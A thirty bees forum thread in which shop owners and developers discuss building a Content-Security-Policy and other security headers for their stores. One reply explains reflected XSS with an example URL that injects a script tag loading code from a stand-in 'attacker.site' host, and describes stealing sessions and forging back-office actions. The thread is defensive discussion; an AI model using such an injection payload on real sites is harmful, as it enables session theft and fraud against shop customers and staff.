Jump to content
thirty bees forum

Content security policy for TB


Raymond

Recommended Posts

Hello

I am working on my server to get a high rate for what is concerning SSL and Headers, so far I managed to get TLS v1.2 and 1.3, disabled v1 and v1.1, added an amount of headers to avoid low security grade, so I did implement the following headers: X-Frame-Options, X-Content-Type-Options, Content-Security-Policy, Referrer-Policy, Permissions-Policy, Strict-Transport-Security

For this header Content-Security-Policy aka CSP I did set a very permissive rules set, which allows practically almost everything, so it is not really effective, however having it is anyway better than not having it at all:

Header always set Content-Security-Policy "default-src 'self';  font-src *; frame-src *; img-src * data:; media-src * data:; object-src *; script-src * 'unsafe-inline' 'unsafe-eval'; style-src * 'unsafe-inline';"

Now using this CSP rule almost everything works fine, but I would like to begin to build a proper rule set to be used with Thirty Bees so to be able not only to score a higher mark for security policies from crawlers and engines but also effectively harden the security of the shop.

For what is concerning TB itself, which would be the minimum rules set to be used to not have troubles?

E.g. in a TB 1.2 installation I am testing on using the rules set posted above if I try to use the core updater there is a problem:

==================

Version to compare to:

request failed, see JavaScript console

The dropdown menu does not work, so it is not possible to choose a version, in the Java console I read this:

Content Security Policy: a resource on https://api.thirtybees.com/coreupdater/master.php was blocked by the configuration of the page (“default-src”).  jquery-1.11.0.min.js:4:25949

Request to https://api.thirtybees.com/coreupdater/master.php failed with status 'rejected'. controller.js:102:15

==================

So even using such a very liberal rule set some functionalities are broken, of course for emergency cases it is always possible to remove this CSP string from httpd.conf, restart the Apache service, do the update, put back the string in httpd.conf, restart Apache and is done, but how much better would be to know which is the magic string that do allow TB to work fine and at the same time have an extra protection layer on the website?

I thought that is a common interest for every merchant/developer to define a CSP for TB core and native modules at least, I am not expert and fond enough to do it all by myself, but I am pretty confident that can be done together here in the forum.

My idea is to remove the unsafe rules one at a time, check what happens in the debug console and add the appropriate rules to have it working right.

E.g. the request rejected above does not fall into any of the rules, so fall back to default-src 'self';

I imagine that adding the domain api.thirtybees.com will solve the problem, but with which correct syntax should be added?

Should be added to the default-src rule? Or it is better to add another specific rule for this kind of requests?

Anyone who is interested in creating "the perfect CSP" string for TB please do participate to this "quest".

The main gola is to have a CSP string that allow TB core and native modules to work without problems and that do prevent other operations, so to harden the shop installation, if then people want to add more rules to have third parties modules and other stuff working that can listed as extra.

By the way, searching how to solve this task I stumbled upon a Wordpress module that automatically report the blocked requests after introducing a basic restrictive CSP header in the server, then automatically output the formatted CSP string to have everything working right, I think that it is interesting for TB a native module of this kind, I add this proposal also  in the "feature request time" topic.

P.S.: the website I used to check the headers is this one https://securityheaders.com

I tried to check what the biggies do and surprisingly not many do implement all the suggested headers and also some do not implement the CSP header.

I do not really know how much this is going to affect a website for non security related matters, e.g. ranking, obviously biggies are a case a apart and are favoured not matter what, however, I thought that in general having these headers set up is maybe better than not have it.

I used this website to check SSL: https://www.ssllabs.com/ssltest/analyze.html

While on a website one can get even a A or A+ mark for what is concerning SSL if no proper headers are adopted too there are still many ways to perform exploits on the website, I read some comments telling that are important and that the SSL test alone is incomplete, giving a false reassurance of not carried out together with a headers test.

I would like to know more about, what is your opinion in this respect?

Thank you

Best regards

R.

 

Edited by Raymond
Link to comment
Share on other sites

The problem with CORS request to api.thirtybees.com will be resolved with the new version of core updater that will be released later this week. Ajax calls to api server were removed and replaced with server-to-server communication. So this particular problem will go away. 

Please report any additional issues you will find! Thank you

Link to comment
Share on other sites

Setting headers doesn't improve security of a server. A browser can respect these settings, a malicious visitor would simply ignore them. To test server security, there are scripts like testssl.sh: https://testssl.sh/ Don't forget to turn off UFW DoS protection and Fail2Ban while testing, testssl.sh triggers them.

That said, these CORS requests for Core Updater still work.

Link to comment
Share on other sites

27 minutes ago, Traumflug said:

Setting headers doesn't improve security of a server. A browser can respect these settings, a malicious visitor would simply ignore them. 

Of course they improve security. They wouldn't exists otherwise. They are not intended to stop attackers interacting with the server directly, of course. But they are very useful for preventing cross site scripting, script injections, and similar attacks.

Example scenario:

Hacker will figure out that some query parameter on your server, say "&id_order=1", is displayed in the page without escaping and validating. Hacker can then create url to your server with this parameter containing javascript. Something like this:

http://yourdomain.com/some/page?id_order%3D%3Cscript%20href%3D%22https%3A//attacker.site/malicious_script.js%22%3E

 This will insert 

<script src="https://atacker.site/malicious_script.js" />

to the page. And that's bad. The script can now do various things - listen to key strokes to figure out password of your customer. Submit ajax requests to submit orders on his behalf, or submit contact form to send spam emails. And who knows what else.

By setting proper CSP on server this problem can be mitigated, to some extent. With strict CSP rules, browsers (the good one) will prevent this injection, and the user won't be affected.

Of course, all such security holes must be fixed in the thirty bee code. But we can never be sure that we fixed all. We probably never will. Thus, having strict CSP would definitely help. 

Link to comment
Share on other sites

2 hours ago, datakick said:

Of course they improve security. They wouldn't exists otherwise. They are not intended to stop attackers interacting with the server directly, of course.

If hackers can work around a security measure by simply accessing the server directly, this measure is pointless. Maybe that's why I don't care much about such headers and turn my attention to safety of the code instead.

That said, if these headers don't get into the way, it's fine to add them. Not too easy, because modules have a tendency to grab resources from about everywhere. Fonts, images, icons, some even call home.

Link to comment
Share on other sites

6 minutes ago, Traumflug said:

If hackers can work around a security measure by simply accessing the server directly, this measure is pointless. Maybe that's why I don't care much about such headers and turn my attention to safety of the code instead.

You apparently don't understand how XSS attack works. It's not the attacker that interact with the server, it's a third party user. If attacker somehow manage to inject javascript to the page that is rendered for different user, he can steal that user session, and do whatever he wants on behalf that poor user. This can be done, for example, by posting exploit link on public forum, or by directly sending link via email to some known server user. Once the user click on the link attacker gain access to his identity / session / cookies. 

This problem is much more severe in the back office, when attacker can act as an employee. They can trigger ajax calls to approve or create orders, change pricing of products, create new employee, or whatnot. At that point it is just a series well formed http requests. They can perform the same operations employee can. That's why store owner should never (or rarely) use admin profile. They should create and use different permission profile, to mitigate the risks.

On front office XSS is not such a huge deal, but it is still a big problem. The attacker can impersonate the customer, and that can lead to serious issues. For example, I can imagine script that posts message via contact form and ask to ship last order to a different address. Shop owner will, of course, believe this message, because it came from logged-in customer. And they will send the goods to different address.

This is a real problem, and CSP can help a lot. It's not silver bullet, of course, but nothing is. 

Link to comment
Share on other sites

Of course I know how XSS works.

24 minutes ago, datakick said:

If attacker somehow manage to inject javascript to the page that is rendered for different user [...]

This "somehow manages" simply must not happen. Neither originating from a browser, nor originating from elsewhere.

Link to comment
Share on other sites

Just now, Traumflug said:

This "somehow manages" simply must not happen. Neither originating from a browser, nor originating from elsewhere.

🙂

It happens all the time. And it will continue to happen. It's just not possible to close all the holes in the core, themes, all the native or third party modules, or any third party software that can be installed alongside

Link to comment
Share on other sites

Hello

As far as I understood the point is to mitigate what I think that can be called the "third man in the middle attack", I think that Datakick's examples  are pretty much pertinent and self explanatory, using these headers and in particular CSP makes it more difficult.

From a non expert point of view as mine is it appears anyway quite clear and logical that when the server and the browser are instructed to not accept "things" coming from sources that are not expressly declared as legit can sensibly reduce the possibility for anyone to inject on the fly instructions to deviate the client toward a malicious server and receive deceptive data or vice versa.

I understand that the use of these headers makes the whole work of the developer/implementer/merchant all more difficult and also costly, however, while of course as a principle is always good to try to patch everything in the software used it is also as well always good as a principle to try to patch everything else that gets in relation with the software used, thus I think that hardening the methods with which the client server communication happens is just logic and a better practice.

As a matter of fact 100% security is maybe never achievable, but the harder is to get around security protocols the better are the chances that an attacker fails, so why not at least try to implement all what is reasonably possible to do?

The CSP rule I did set is extra permissive, I also use the mod_security using WAF rules from Comodo, at the moment almost everything seems to work well, I need to study more on this and I will report here my findings, anyone interested please participate to this initiative, it would be very good to find out the proper "recipe" to have a good CSP policy that works fine with TB.

Thank you

Best regards

Edited by Raymond
  • Like 1
Link to comment
Share on other sites

  • 8 months later...

I was about to contact you due to CSP and found this thread. Is TB team working on this?

Using Mozilla Observatory the best score I can get, making frontoffice & backoffice work, is B (screens in attachment).

One first (easy I hope) step to let users setting a stronger CSP would be not using any inline script & css.

Another is implementing some Subresource Integrity.

csp_details.png

test_results.png

Link to comment
Share on other sites

7 minutes ago, nickz said:

The more you throttle your shop the less speed and visitors you'll have.

I'm very sure that one more http header in response will not have any measureable impact on store speed. It can have a huge (positive) impact on store security, though. 

 

 

  • Like 1
Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
×
×
  • Create New...